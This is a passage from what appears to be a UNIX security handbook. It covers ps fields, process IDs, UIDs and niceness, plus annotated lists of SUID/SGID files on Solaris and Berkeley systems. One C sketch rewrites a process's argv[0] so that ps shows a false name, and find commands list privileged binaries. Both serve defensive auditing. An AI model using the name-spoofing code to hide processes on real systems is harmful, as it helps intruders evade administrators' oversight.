TIME CPU time used by the process<br />

COMMAND The name of the command (and arguments)<br />

[2] If this happens, follow up to be sure you don't have an intruder.<br />

Table C.3: Runnability of Process (First Letter of STAT Field)<br />

Letter Meaning<br />

R Actually running or runnable<br />

S Sleeping (sleeping > 20 seconds)<br />

I Idle (sleeping < 20 seconds)<br />

T Stopped<br />

H Halted<br />

P In page wait<br />

D In disk wait<br />

Z Zombie<br />

Table C.4: Whether Process Swapped (<strong>Sec</strong>ond Letter of STAT Field)<br />

Letter Meaning<br />

(blank) In core<br />

W Swapped out<br />

> A process that has exceeded a soft limit on memory requirements<br />

Table C.5: Whether Process Is Running with Altered CPU Schedule (Third Letter of STAT Field)<br />

Letter Meaning<br />

N The process is running at a low priority (a nice number greater than 0).<br />

< The process is running at a high priority.<br />

NOTE: Because command arguments are stored in the process's own memory space, a process can change what appears<br />

on its command line. If you suspect that a process may not be what it claims to be, type:<br />

% ps -c<br />

This causes ps to print the name of the command stored in the kernel. This approach is substantially faster than the standard ps, and is<br />


more suitable for use with scripts that run periodically. Unfortunately, the ps -c display does not include the arguments of each<br />

command that is running.<br />
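
The following short C program is our own sketch (not from the standard <strong>UNIX</strong> distribution) of how a process can overwrite its own argument list. On many systems a plain ps will then show the substituted string in its COMMAND column, while ps -c still reports the command name recorded by the kernel, which is why the -c form is the one to trust.<br />

#include <string.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    if (argc > 0) {
        /* Reuse only the space that the original name occupied. */
        size_t room = strlen(argv[0]);

        memset(argv[0], '\0', room);
        strncpy(argv[0], "harmless", room);
    }
    sleep(60);   /* pause so the process can be inspected with ps and ps -c */
    return 0;
}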

C.1.3 Process Properties<br />

The kernel maintains a set of properties for every <strong>UNIX</strong> process. Most of these properties are denoted by numbers. Some of these<br />

numbers refer to processes, while others determine what privileges the processes have.<br />

C.1.3.1 Process identification numbers (PID)<br />

Every process is assigned a unique number called the process identifier, or PID. The first process to run, called init, is given the<br />

number 1. Process numbers can range from 1 to 65535.[3] When the kernel runs out of process numbers, it recycles them. The kernel<br />

guarantees that no two active processes will ever have the same number.<br />

[3] Some versions of <strong>UNIX</strong> may allow process numbers in a range different from 1 to 65535.<br />
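
As a small illustration (our own sketch, not part of the original text), a process can ask the kernel for its own PID and for its parent's PID with the getpid() and getppid() system calls:<br />

#include <stdio.h>
#include <unistd.h>

int main(void)
{
    /* getpid() returns this process's PID; getppid() returns the PID
       of the parent process that created it.                         */
    printf("my PID is %ld, my parent's PID is %ld\n",
           (long) getpid(), (long) getppid());
    return 0;
}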

C.1.3.2 Process real and effective UID<br />

Every <strong>UNIX</strong> process has two user identifiers: a real UID and an effective UID.<br />

The real UID (RUID) is the actual user identifier (UID) of the person who is running the program. It is usually the same as the UID<br />

of the actual person who is logged into the computer, sitting in front of the terminal (or workstation).<br />

The effective UID (EUID) identifies the actual privileges of the process that is running.<br />

Normally, the real UID and the effective UID are the same. That is, normally you have only the privileges associated with your own<br />

UID. Sometimes, however, the real and effective UID can be different. This occurs when a user runs a special kind of program,<br />

called a SUID program, which is used to accomplish a specific function (such as changing the user's password). SUID programs are<br />

described in Chapter 4, Users, Groups, and the Superuser.<br />
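
The short C sketch below (ours, not from the original text) prints both identifiers using getuid() and geteuid(). A careful SUID program typically calls setuid(getuid()) to give up its extra privileges as soon as they are no longer needed; after that call, the two values match again:<br />

#include <stdio.h>
#include <unistd.h>

int main(void)
{
    printf("real UID = %ld, effective UID = %ld\n",
           (long) getuid(), (long) geteuid());

    /* Drop any SUID privilege: make the effective UID equal the real
       UID.  This is a no-op if the two were already the same.        */
    if (setuid(getuid()) < 0)
        perror("setuid");

    printf("after setuid: real UID = %ld, effective UID = %ld\n",
           (long) getuid(), (long) geteuid());
    return 0;
}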

C.1.3.3 Process priority and niceness<br />

Although <strong>UNIX</strong> is a multitasking operating system, most computers that run <strong>UNIX</strong> can run only a single process at a time.[4] Every<br />

fraction of a second, the <strong>UNIX</strong> operating system rapidly switches between many different processes, so that each one gets a little bit<br />

of work done within a given amount of time. A tiny but important part of the <strong>UNIX</strong> kernel called the process scheduler decides<br />

which process is allowed to run at any given moment and how much CPU time that process should get.<br />

[4] Multiprocessor computers can run as many processes at a time as they have processors.<br />

To calculate which process it should run next, the scheduler computes the priority of every process. The process with the lowest<br />

priority number (or the highest priority) runs. A process's priority is determined with a complex formula that includes what the<br />

process is doing and how much CPU time the process has already consumed. A special number, called the nice number or simply the<br />

nice, biases this calculation: the lower a process's nice number, the higher its priority, and the more likely that it will be run.<br />

On most versions of <strong>UNIX</strong>, nice numbers are limited from -20 to +20. Most processes have a nice of 0. A process with a nice number<br />

of +19 will probably not run until the system is almost completely idle; likewise, a process with a nice number of -19 will probably<br />

preempt every other user process on the system.<br />

Sometimes you will want to make a process run slower. In some cases, processes take more than their "fair share" of the CPU, but<br />

you don't want to kill them outright. An example is a program that a researcher has left running overnight to perform mathematical<br />

calculations that isn't finished the next morning. In this case, rather than killing the process and forcing the researcher to restart it<br />

later from the beginning, you could simply cut the amount of CPU time that the process is getting and let it finish slowly during the<br />

day. The program /etc/renice lets you change a process's niceness.<br />

For example, suppose that Mike left a program running before he went home. Now it's late at night, and Mike's program is taking up<br />

most of the computer's CPU time:<br />

% ps aux | head -5<br />

USER PID %CPU %MEM VSIZE RSIZE TT STAT TIME COMMAND<br />

mike 211 70.0 6.7 2.26M 1.08M 01 R 4:01 cruncher<br />

mike 129 8.2 15.1 7.06M 2.41M 01 S 0:48 csh<br />

donna 212 7.0 7.3 2.56M 1.16M p1 S 1:38 csh<br />


michelle 290 4.0 11.9 14.4M 1.91M 03 R 19:00 rogue %<br />

You could slow down Mike's program by renicing it to a higher nice number.<br />

For security reasons, normal users are only allowed to increase the nice numbers of their own processes. Only the superuser can<br />

lower the nice number of a process or raise the nice number of somebody else's process. (Fortunately, in this example, we know the<br />

superuser password!)<br />

% /bin/su<br />

password: another39<br />

# /etc/renice +4 211<br />

211: old priority 0, new priority 4<br />

# ps u211<br />

USER PID %CPU %MEM VSIZE RSIZE TT STAT TIME COMMAND<br />

mike 211 1.5 6.7 2.26M 1.08M 01 R N 4:02 cruncher<br />

The N in the STAT field indicates that the cruncher process is now running at a lower priority (it is "niced"). Notice that the process's<br />

CPU consumption has already decreased. Any new processes that are spawned by the process with PID 211 will inherit this new nice<br />

value, too.<br />

You can also use /etc/renice to lower the nice number of a process to make it finish faster.[5] Although setting a process to a lower<br />

priority won't speed up the CPU or make your computer's hard disk transfer data faster, the negative nice number will cause <strong>UNIX</strong> to<br />

run a particular process more than it runs others on the system. Of course, if you ran every process with the same negative priority,<br />

there wouldn't be any apparent benefit.<br />

[5] Only root can renice a process to make it faster. Normal processes can't even change themselves back to what they<br />

were (if they've been niced down). Normal users can't even raise the priority of their processes to the value at which they<br />

were started.<br />

Some versions of the renice command allow you to change the nice of all processes belonging to a user or all processes in a process<br />

group (described in the next section). For instance, to speed up all of Mike's processes, you might type:<br />

# renice -2 -u mike<br />

Remember, processes with a lower nice number run faster.<br />

Note that because of the <strong>UNIX</strong> scheduling system, renicing several processes to lower numbers is likely to increase paging activity if<br />

there is limited physical memory, and therefore adversely impact overall system performance.<br />

What do process priority and niceness have to do with security? If an intruder has broken into your system and you have contacted<br />

the authorities and are tracing the phone call, slowing the intruder down with a priority of +10 or +15 will limit the damage that the<br />

intruder can do without hanging up the phone (and losing your chance to catch the intruder). Of course, any time that an intruder is<br />

on a system, exercise extreme caution.<br />

Also, running your own shell with a higher priority may give you an advantage if the system is heavily loaded. The easiest way to do<br />

so is by typing:<br />

# renice -5 $$<br />

The shell will replace the $$ with the PID of the shell's process.<br />
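
A process can also examine and raise its own nice value from within a program. The sketch below is ours, using the 4.3BSD-style getpriority() and setpriority() calls (the exact interface varies among <strong>UNIX</strong> versions); it applies the same +4 change shown above, but to the calling process itself. Lowering the value would require superuser privileges:<br />

#include <stdio.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/resource.h>

int main(void)
{
    int old;

    errno = 0;
    old = getpriority(PRIO_PROCESS, 0);   /* 0 means "the calling process" */
    if (old == -1 && errno != 0) {
        perror("getpriority");
        return 1;
    }
    printf("current nice value: %d\n", old);

    /* Make the process "nicer" by 4, much like "renice +4" above. */
    if (setpriority(PRIO_PROCESS, 0, old + 4) < 0) {
        perror("setpriority");
        return 1;
    }
    printf("new nice value: %d\n", getpriority(PRIO_PROCESS, 0));
    return 0;
}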

C.1.3.4 Process groups and sessions<br />

With Berkeley-derived versions of <strong>UNIX</strong>, including SVR4, each process is assigned a process ID (PID), a process group ID, and a<br />

session ID. Process groups and sessions are used to implement job control.<br />

For each process, the PID is a unique number, the process group ID is the PID of the process group leader process, and the session ID<br />

is the PID of the session leader process. When a process is created, it inherits the process group ID and the session ID of its parent<br />

process. Any process may create a new process group by calling setpgrp() and may create a new session by calling the <strong>UNIX</strong> system<br />

call setsid(). All processes that have the same process group ID are said to be in the same process group.<br />

Each <strong>UNIX</strong> process group belongs to a session group. This is used to help manage signals and orphaned processes. Once a user has<br />

logged in, the user may start multiple sets of processes, or jobs, using the shell's job-control mechanism. A job may have a single<br />

process, such as a single invocation of the ls command. Alternatively, a job may have several processes, such as a complex shell<br />

pipeline. For each of these jobs, there is a process group. <strong>UNIX</strong> also keeps track of the particular process group which is controlling<br />


the terminal. This can be set or changed with ioctl() system calls. Only the controlling process group can read or write to the terminal.<br />

A process could become an orphan if its parent process exits but it continues to run. Historically, these processes would be inherited<br />

by the init process but would remain in their original process group. If a signal were sent by the controlling terminal (process group),<br />

then it would go to the orphaned process, even though it no longer had any real connection to the terminal or the rest of the process<br />

group.<br />

To counter this, POSIX defines an orphaned process group. This is a process group where the parent of every member is either not a<br />

member of the process group's session, or is itself a member of the same process group. Orphaned process groups are not sent<br />

terminal signals when they are generated. Because of the way in which new sessions are created, the initial process in the first<br />

process group is always an orphan (its ancestor is not in the session). Command interpreters are usually spawned as session leaders so<br />

they ignore TSTP signals from the terminal.<br />
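
The sketch below (ours, not from the original text) shows the classic daemon idiom built on these calls: fork(), let the parent exit, and call setsid() in the child so that it becomes the leader of a new session and a new process group, with no controlling terminal:<br />

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
    pid_t pid = fork();

    if (pid < 0) {
        perror("fork");
        exit(1);
    }
    if (pid > 0)
        exit(0);            /* parent exits; the child carries on           */

    if (setsid() < 0) {     /* child becomes session and group leader, with */
        perror("setsid");   /* no controlling terminal                      */
        exit(1);
    }
    printf("session leader: pid=%ld pgrp=%ld\n",
           (long) getpid(), (long) getpgrp());
    return 0;
}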



[Appendix B] B.3 SUID and SGID Files<br />

Appendix B<br />

Important Files<br />

B.3 SUID and SGID Files<br />

To run a secure computer, you must know of every SUID and SGID file on the system and be sure that each file has the<br />

proper permissions for which it was designed.<br />

Unfortunately, there is a huge amount of variation among <strong>UNIX</strong> vendors in the use of SUID and SGID. Some manufacturers<br />

use SUID root for all privilege-requiring programs, while some create special groups for controlling terminals (group tty), or<br />

disks (group operator), or memory (group kmem). Some vendors use a variety of approaches. Most change their approaches<br />

to SUID and SGID from software release to software release. As a result, any attempt to list SUID and SGID files on a<br />

system that is not constrained to a particular release is likely to be incomplete.<br />

You may also receive SUID or SGID files as part of third-party software that you may purchase or download from the net.<br />

Many of these third-party programs require SUID root permission because they modify devices or do things on behalf of<br />

users. If you choose to use these programs, you should seek assurance from the vendor that superuser privileges are confined<br />

to the smallest possible region of the program, and that, in general, rules such as those contained in Chapter 23, Writing<br />

<strong>Sec</strong>ure SUID and Network Programs, have been followed in coding the software. You may also wish to obtain written<br />

representations from the vendor that the security of the computer system will not be compromised as a result of SUID/SGID<br />

programs, and that, in the event that the system is compromised, the vendor will pay for damages.<br />

B.3.1 SUID/SGID Files in Solaris 2.4 (SVR4)<br />

This section contains a list of the SUID and SGID files found in Solaris 2.4, which is representative of System V Release 4<br />

systems in general. Rather than simply presenting a complete list of files, we have annotated the reason that SUID or SGID<br />

permissions are set. Our goal is to teach you how to recognize the SUID/SGID files on your system, and make your own<br />

decision as to whether the privilege is justified, or whether some lesser privilege would suffice.<br />

You can generate your own list of SUID files by using the command:<br />

# find / -type f -perm -04000 -ls<br />

You can generate a list of SGID files by using the command:<br />

# find / -type f -perm -02000 -ls<br />
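
If you prefer to make the test from a program, the short C sketch below (ours) checks a single file for the same permission bits that the find commands above match with -perm:<br />

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>

int main(int argc, char *argv[])
{
    struct stat st;

    if (argc != 2) {
        fprintf(stderr, "usage: %s file\n", argv[0]);
        return 2;
    }
    if (stat(argv[1], &st) < 0) {
        perror(argv[1]);
        return 2;
    }
    if (st.st_mode & S_ISUID)       /* the 04000 bit matched by find */
        printf("%s is SUID (owner UID %ld)\n", argv[1], (long) st.st_uid);
    if (st.st_mode & S_ISGID)       /* the 02000 bit matched by find */
        printf("%s is SGID (group GID %ld)\n", argv[1], (long) st.st_gid);
    return 0;
}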

B.3.1.1 SUID files<br />

-r-sr-xr-x 1 root sys 610480 Aug 3 1994 /sbin/su<br />

-r-sr-xr-x 1 root bin 559968 Aug 3 1994 /sbin/sulogin<br />

-r-sr-xr-x 1 root sys 15156 Jul 16 1994 /usr/bin/su<br />

The su command is SUID root so it can alter the process's effective UID. We don't understand why sulogin needs to be SUID<br />

root, because it is only run when the system boots in single-user mode (and, presumably, it is already running as root). The<br />

/sbin/su program is statically linked, which is why it is so much larger than /usr/bin/su, which uses shared libraries.<br />

-rwsr-xr-x 1 root sys 32144 Jul 15 1994 /usr/bin/at<br />

-rwsr-xr-x 1 root sys 12128 Jul 15 1994 /usr/bin/atq<br />

-rwsr-xr-x 1 root sys 10712 Jul 15 1994 /usr/bin/atrm<br />

The at commands are SUID root because they run commands for all user IDs, and need root permissions to set the user and<br />


group permissions of jobs. Additionally, the directory where these jobs are stored is protected to prevent snooping and<br />

tampering with the files, and root permissions are used to enforce these protections.<br />

-r-sr-xr-x 1 root sys 29976 Jul 16 1994 /usr/bin/chkey<br />

The chkey command is SUID root because it accesses the /etc/publickey database.<br />

-r-sr-xr-x 1 root bin 14600 Jul 15 1994 /usr/bin/cron<br />

The cron program is SUID root so that it can alter files in the /var/spool/cron directory. As with the at commands above, it<br />

also runs jobs under different user IDs and needs root privileges to do so.<br />

-r-sr-xr-x 1 root bin 9880 Jul 16 1994 /usr/bin/eject<br />

-r-sr-xr-x 1 root bin 22872 Jul 16 1994 /usr/bin/fdformat<br />

-r-sr-xr-x 1 root bin 4872 Jul 16 1994 /usr/bin/volcheck<br />

These programs are SUID root because they directly manipulate the floppy disk device.<br />

-r-sr-xr-x 1 root bin 27260 Jul 16 1994 /usr/bin/login<br />

login must be SUID root so that one user can use login to log in as another user without first logging out. If login were not<br />

SUID root, it could not change its real and effective UID to be that of another user. If the program is not SUID, then users<br />

need to log out before logging in as another user - a minor inconvenience. Many site administrators prefer this behavior and<br />

remove the SUID permission on login as a result.<br />

-rwsr-xr-x 1 root sys 9520 Jul 16 1994 /usr/bin/newgrp<br />

newgrp is SUID root because it must alter the process's effective and real group IDs (GIDs).<br />

-r-sr-sr-x 1 root sys 11680 Jul 16 1994 /usr/bin/passwd<br />

This program must be SUID root because it modifies the /etc/passwd or /etc/shadow files.<br />

-r-sr-xr-x 1 root sys 17800 Jul 16 1994 /usr/bin/ps<br />

-r-sr-xr-x 1 root bin 12080 Jul 16 1994 /usr/sbin/whodo<br />

These programs are SUID root because they need access to the computer's /dev/mem and /dev/kmem devices, and to access<br />

some accounting files. Perhaps a safer approach would be to have a kmem group and have needed files be SGID kmem.<br />

-r-sr-xr-x 1 root bin 15608 Jul 15 1994 /usr/bin/rcp<br />

-r-sr-xr-x 1 root bin 60268 Jul 15 1994 /usr/bin/rdist<br />

-r-sr-xr-x 1 root bin 14536 Jul 15 1994 /usr/bin/rlogin<br />

-r-sr-xr-x 1 root bin 7920 Jul 15 1994 /usr/bin/rsh<br />

-rwsr-xr-x 1 root other 7728 Jul 16 1994 /usr/bin/yppasswd<br />

-r-sr-x--x 1 root bin 134832 Jul 16 1994 /usr/lib/sendmail<br />

-r-sr-x--x 1 root bin 137552 Jul 16 1994 /usr/lib/sendmail.mx<br />

-r-sr-xr-x 1 root bin 17968 Jul 15 1994 /usr/sbin/ping<br />

-r-sr-xr-x 1 root bin 510532 Jul 15 1994 /usr/sbin/static/rcp<br />

In general, these programs are all SUID root because they need to create TCP/IP connections on ports below 1024. The<br />

sendmail program also needs the ability to modify files stored in its working directories. The ping program needs to use raw<br />

IP.<br />

-rws--x--x 1 uucp bin 55608 Jul 16 1994 /usr/bin/tip<br />

---s--x--x 1 root uucp 68816 Jul 15 1994 /usr/bin/ct<br />

---s--x--x 1 uucp uucp 81904 Jul 15 1994 /usr/bin/cu<br />

These programs are SUID uucp so that they can access the dialer and modem devices.<br />

-r-sr-xr-x 2 root bin 10888 Jul 16 1994 /usr/bin/uptime<br />

-r-sr-xr-x 2 root bin 10888 Jul 16 1994 /usr/bin/w<br />

We can't figure out why these programs are SUID root, as they access files (/var/adm/utmp and /dev/kstat) that are<br />

world-readable. These are hard links which you can verify by using ls -li.<br />

---s--x--x 1 uucp uucp 64240 Jul 15 1994 /usr/bin/uucp<br />


---s--x--x 1 uucp uucp 21304 Jul 15 1994 /usr/bin/uuglist<br />

---s--x--x 1 uucp uucp 17144 Jul 15 1994 /usr/bin/uuname<br />

---s--x--x 1 uucp uucp 60952 Jul 15 1994 /usr/bin/uustat<br />

---s--x--x 1 uucp uucp 68040 Jul 15 1994 /usr/bin/uux<br />

---s--x--x 1 uucp uucp 4816 Jul 15 1994 /usr/lib/uucp/remote.unknown<br />

---s--x--x 1 uucp uucp 169096 Jul 15 1994 /usr/lib/uucp/uucico<br />

---s--x--x 1 uucp uucp 32016 Jul 15 1994 /usr/lib/uucp/uusched<br />

---s--x--x 1 uucp uucp 81040 Jul 15 1994 /usr/lib/uucp/uuxqt<br />

These programs are SUID uucp because they need to access privileged UUCP directories and files.<br />

-r-sr-xr-x 1 root bin 21496 Jul 16 1994 /usr/lib/exrecover<br />

This file is SUID root so that it can access the directory in which editor recovery files are saved. As we have said in other<br />

places in the book, a more secure approach would be to have an account specifically created for accessing this directory, or to<br />

create user-owned subdirectories in a common save directory.<br />

-r-sr-sr-x 1 root tty 151352 Jul 15 1994 /usr/lib/fs/ufs/ufsdump<br />

-r-sr-xr-x 1 root bin 605348 Jul 15 1994 /usr/lib/fs/ufs/ufsrestore<br />

These files are SUID root so that users other than the superuser can make backups. In the Solaris version of these commands,<br />

any user who is in the sys group can dump the contents of the system's disks and restore them without having root access. (As<br />

a result, having sys access on this operating system means that you can effectively read any file on the computer by using a<br />

combination of ufsdump and ufsrestore.) Note: the fact that users in the sys group can dump and undump tapes is not<br />

documented in the man page. Other programs may give undocumented privileges to users who happen to be in particular<br />

groups.<br />

-rwsr-xr-x 1 root adm 4008 Jul 15 1994 /usr/lib/acct/accton<br />

There must be some reason that this program is SUID root. But, once again, we can't figure it out, as the program gives the<br />

error "permission denied" when it is run by anybody other than the superuser.<br />

-rwsr-xr-x 3 root bin 13944 Jul 16 1994 /usr/sbin/allocate<br />

-rwsr-xr-x 3 root bin 13944 Jul 16 1994 /usr/sbin/deallocate<br />

-rwsr-xr-x 3 root bin 13944 Jul 16 1994 /usr/sbin/list_devices<br />

The allocate command allocates devices to users based on the Solaris allocation mechanism. For more information, refer to<br />

the Solaris documentation. We believe that the mkdevalloc and mkdevmaps commands are part of the same system, but they<br />

are not documented.<br />

-rwsr-xr-x 1 root sys 21600 Jul 16 1994 /usr/sbin/sacadm<br />

The sacadm command is the top-level entry point into the Service Access Facility system.<br />

-rwsrwxr-x 1 root bin 87808 Jun 24 1994 /usr/openwin/bin/xlock<br />

We think that xlock needs to be SUID root so that it can read your password from the shadow file.<br />

-r-sr-sr-x 1 root sys 20968 Jun 27 1995 /usr/dt/bin/dtaction<br />

-r-sr-xr-x 1 root bin 69172 Jun 27 1995 /usr/dt/bin/dtappgather<br />

-r-sr-xr-x 1 root bin 134600 Jun 27 1995 /usr/dt/bin/dtsession<br />

-r-sr-xr-x 1 root bin 373332 Jun 27 1995 /usr/dt/bin/dtprintinfo<br />

-r-sr-sr-x 1 root daemon 278060 Jun 27 1995 /usr/dt/bin/sdtcm_convert<br />

These programs all appear to perform session management as part of the Common Desktop Environment 1.0. We don't know<br />

why dtaction needs to be SUID root.<br />

B.3.1.2 Undocumented SUID programs<br />

The following programs are SUID and undocumented. This combination is dangerous, because there is no way to tell for sure<br />

what these programs are supposed to do, if they have their SUID/SGID bits properly set, or if they are even part of the<br />

standard operating system release.<br />

---s--x--x 1 root bin 3116 Jul 16 1994 /usr/lib/pt_chmod<br />


-r-sr-xr-x 1 root bin 5848 Jul 16 1994 /usr/lib/utmp_update<br />

-rwsr-xr-x 1 root bin 8668 Jul 16 1994 /usr/sbin/mkdevalloc<br />

-rwsr-xr-x 1 root bin 9188 Jul 16 1994 /usr/sbin/mkdevmaps<br />

-r-sr-sr-x 1 root bin 14592 Jul 15 1994 /usr/openwin/bin/ff.core<br />

-rwsr-xr-x 1 root bin 19580 Jun 24 1994 /usr/openwin/lib/mkcookie<br />

-rwsr-sr-x 1 bin bin 8288 Jul 16 1994 /usr/vmsys/bin/chkperm<br />

-r-sr-xr-x 1 lp lp 203 Jul 18 1994 /etc/lp/alerts/printer<br />

B.3.1.3 SGID files<br />

-rwxr-sr-x 1 root sys 147832 Jul 15 1994 /usr/kvm/crash<br />

-r-xr-sr-x 1 bin sys 31440 Jul 15 1994 /usr/bin/netstat<br />

-r-xr-sr-x 1 bin sys 11856 Jul 16 1994 /usr/bin/nfsstat<br />

-r-xr-sr-x 1 bin sys 11224 Jul 16 1994 /usr/bin/ipcs<br />

-r-xr-sr-x 1 root bin 6912 Jul 15 1994 /usr/sbin/arp<br />

-r-xr-sr-x 1 bin sys 6280 Jul 16 1994 /usr/sbin/fusage<br />

-r-xr-sr-x 1 root sys 15128 Jul 16 1994 /usr/sbin/prtconf<br />

-r-xr-sr-x 1 bin sys 7192 Jul 16 1994 /usr/sbin/swap<br />

-r-xr-sr-x 1 root sys 21416 Jul 16 1994 /usr/sbin/sysdef<br />

-r-xr-sr-x 1 bin sys 5520 Jul 15 1994 /usr/sbin/dmesg<br />

-rwxr-sr-x 1 root sys 12552 Jul 18 1994 /usr/openwin/bin/wsinfo<br />

-rwxrwsr-x 1 root sys 9272 Jul 18 1994 /usr/openwin/bin/xload<br />

These programs examine and/or modify memory of the running system and use group permissions to read the necessary<br />

device files.<br />

-r-xr-sr-x 1 bin sys 28696 Jul 16 1994 /usr/kvm/eeprom<br />

The eeprom program allows you to view or modify the contents of the system's EEPROM. It should probably not be<br />

executable by non-root users.<br />

-r-x--s--x 1 bin mail 65408 Jul 16 1994 /usr/bin/mail<br />

-r-x--s--x 1 bin mail 132888 Jul 16 1994 /usr/bin/mailx<br />

-r-xr-sr-x 1 root mail 449960 Jul 15 1994 /usr/openwin/bin/mailtool<br />

-r-xr-sr-x 1 bin mail 825220 Jun 27 1995 /usr/dt/bin/dtmail<br />

-r-xr-sr-x 1 bin mail 262708 Jun 27 1995 /usr/dt/bin/dtmailpr<br />

The mail programs can be used to send mail or read mail in the /var/mail directory. We are not certain why these programs<br />

need to be SGID mail; however, we suspect it involves lock management.<br />

-r-sr-sr-x 1 root sys 20968 Jun 27 1995 /usr/dt/bin/dtaction<br />

This is another part of the Common Desktop Environment system. We don't know why it is both SUID and SGID.<br />

-r-sr-sr-x 1 root sys 11680 Jul 16 1994 /usr/bin/passwd<br />

We do not know why this program needs to be both SUID root and SGID sys.<br />

-r-xr-sr-x 1 bin tty 9984 Jul 16 1994 /usr/bin/write<br />

-r-sr-sr-x 1 root tty 151352 Jul 15 1994 /usr/lib/fs/ufs/ufsdump<br />

-r-xr-sr-x 1 bin tty 9296 Jul 16 1994 /usr/sbin/wall<br />

These programs are SGID tty so that they can write on the devices of users.<br />

-rwxr-sr-x 1 root root 650620 Jun 24 1994 /usr/openwin/bin/Xsun<br />

Xsun is the X-Window server for the Sun. It is SGID so that it can access necessary device files.<br />

-r-sr-sr-x 1 root daemon 278060 Jun 27 1995 /usr/dt/bin/sdtcm_convert<br />

This program converts files from the Open Windows calendar data format version 3 to version 4. According to the<br />

documentation, sdtcm_convert must be run by the superuser or the owner of the calendar. Users can only run the program on<br />

their own calendars; the superuser can run the program on any calendar. Because the /var/spool/calendar directory is mode<br />


3777, there should be no reason for this program to be SUID or SGID.<br />

B.3.1.4 Undocumented SGID files<br />

These files are not documented in the Solaris system documentation:<br />

-r-sr-sr-x 1 root bin 14592 Jul 15 1994 /usr/openwin/bin/ff.core<br />

-rwsr-sr-x 1 bin bin 8288 Jul 16 1994 /usr/vmsys/bin/chkperm<br />

B.3.2 SUID/SGID Files in Berkeley <strong>UNIX</strong><br />

This list of SUID and SGID files in Berkeley <strong>UNIX</strong> was derived by looking at computers made by Sun Microsystems, Digital<br />

Equipment Corporation, and NeXT Inc. The list of SUID and SGID files on your version of Berkeley <strong>UNIX</strong> is likely to be<br />

different. For this reason, we not only list which files are SUID and SGID, we also explain why they are SUID or SGID. After<br />

reading this list, you should be able to look at all of the SUID and SGID files on your system and figure out why your files<br />

have been set in particular ways. If you have a question about a file that is SUID or SGID, consult your documentation or<br />

contact your vendor.<br />

B.3.2.1 SUID files<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /usr/etc/ping<br />

ping must be SUID root so that it can transmit ICMP ECHO requests on the raw IP port.<br />

-r-s--x--x 1 root wheel 16384 Aug 18 1989 /usr/etc/timedc<br />

The timedc (Time Daemon Control) program must be SUID root so that it can access the privileged time port.<br />

-r-sr-x--x 3 root wheel 81920 Sep 7 1989 /usr/lib/sendmail<br />

-r-sr-x--x 3 root wheel 81920 Sep 7 1989 /usr/bin/newaliases<br />

-r-sr-x--x 3 root wheel 81920 Sep 7 1989 /usr/bin/mailq<br />

These programs are all hard links to the same binary. The sendmail program must be SUID root because it listens on TCP/IP<br />

port 25, which is privileged.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 15 1989 /usr/lib/ex3.7recover<br />

-rwsr-xr-x 1 root wheel 16384 Aug 15 1989 /usr/lib/ex3.7preserve<br />

These programs, part of the vi editor system, must be SUID root so they can read and write the backup files used by vi.<br />

(These are often SGID preserve.)<br />

-rws--x--x 1 root wheel 40960 Nov 15 1989 /usr/lib/lpd<br />

-rws--s--x 1 root daemon 24576 Sep 6 1989 /usr/ucb/lpr<br />

-rws--s--x 1 root daemon 24576 Sep 6 1989 /usr/ucb/lpq<br />

-rws--s--x 1 root daemon 24576 Sep 6 1989 /usr/ucb/lprm<br />

The line-printer daemon must be SUID root so it can listen on TCP/IP port 515, the printer port, and so can read and write<br />

files in the /usr/spool/lpd directory. Likewise, the line-printer user commands must be SUID so they can access spool files<br />

and the printer device.<br />

-rwsr-xr-x 1 root wheel 24576 Aug 18 1989 /bin/ps<br />

-rwsr-xr-x 2 root wheel 57344 Aug 18 1989 /usr/ucb/w<br />

-rwsr-xr-x 2 root wheel 57344 Aug 18 1989 /usr/ucb/uptime<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /usr/bin/iostat<br />

These programs must be SUID root because they need to read the kernel's memory to generate the statistics that they print.<br />

On some systems, these programs are distributed SGID kmem, and /dev/kmem is made readable only by this group. This<br />

second approach is more secure than the first approach.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /usr/ucb/quota<br />

The quota command must be SUID root so that it can read the quota file.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /usr/ucb/rcp<br />


-rwsr-x--x 1 root wheel 32768 Aug 18 1989 /usr/ucb/rdist<br />

-rwsr-xr-x 1 root wheel 16384 Aug 23 1989 /usr/ucb/rlogin<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /usr/ucb/rsh<br />

-rwsr-sr-x 1 root tty 32768 Nov 11 17:17 /usr/etc/rdump<br />

These programs must be SUID root because they use privileged ports to do username authentication.<br />

-rwsr-xr-x 1 daemon wheel 16384 Aug 18 1989 /usr/bin/atq<br />

-rwsr-xr-x 1 daemon wheel 16384 Aug 18 1989 /usr/bin/at<br />

-rwsr-xr-x 1 daemon wheel 16384 Aug 18 1989 /usr/bin/atrm<br />

These programs must be SUID because they access and modify spool files that are kept in privileged directories.<br />

-rws--x--x 2 root daemon 205347 Sep 29 10:14 /usr/bin/tip<br />

-rws--x--x 2 root daemon 205347 Sep 29 10:14 /usr/bin/cu<br />

tip and cu, which are both hard links to the same binary, must be SUID root so that they can have physical access to the<br />

modem device. On some systems, these files may be SUID UUCP.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /bin/login<br />

login must be SUID root so that one user can use login to log in as another user, without first logging out. If login were not<br />

SUID root, it could not change its real and effective UID to be that of another user.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 21 1989 /bin/mail<br />

mail must be SUID root so that it can append messages to a user's mail file.<br />

-rwsr-xr-x 1 root wheel 16384 Aug 18 1989 /bin/passwd<br />

-rwsr-xr-x 1 root system 28672 Feb 21 1990 /usr/ucb/chsh<br />

-rwsr-xr-x 1 root system 28672 Feb 21 1990 /usr/ucb/chfn<br />

These programs must be SUID root because they modify the /etc/passwd file.<br />

-rwsr-xr-x 1 root wheel 16384 Sep 3 1989 /bin/su<br />

su must be SUID root so it can change its process's effective UID to that of another user.<br />

--s--s--x 1 uucp daemon 24576 Sep 3 1989 /usr/bin/uucp<br />

--s--s--x 1 uucp daemon 24576 Sep 3 1989 /usr/bin/uux<br />

--s--s--x 1 uucp daemon 16384 Sep 3 1989 /usr/bin/uulog<br />

